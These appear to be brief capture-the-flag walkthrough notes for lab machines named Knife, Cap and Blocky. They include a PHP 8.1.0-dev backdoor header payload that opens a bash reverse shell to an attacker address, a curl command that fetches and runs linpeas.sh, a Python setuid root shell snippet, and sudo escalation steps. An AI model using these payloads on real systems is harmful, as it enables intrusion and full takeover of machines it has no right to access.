Back

Easy shorts

Knife

[!hint] PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/<your_ip>/<port> 0>&1'");

• Upgrade a linux reverse shell to a fully usable TTY shell

[!hint] GTFObins knife

Cap

[!hint] Privileges Escalation curl http://<target_ip>/linpeas.sh | bash from python3 -m http.server 80 Files with capabilities

import os
os.setuid(0)
os.system("/bin/bash")

Blocky

• enumerate target
• brute force directories
• unzip file and decompile with:
  • Decompilers online
  • or jd-gui
  • or jad
• login as <user> and check privileges/permissions
• sudo -l | sudo -i | sudo su

[!note] Linux Enumeration Tools That can be helpful Linpeas, LES, LinEnum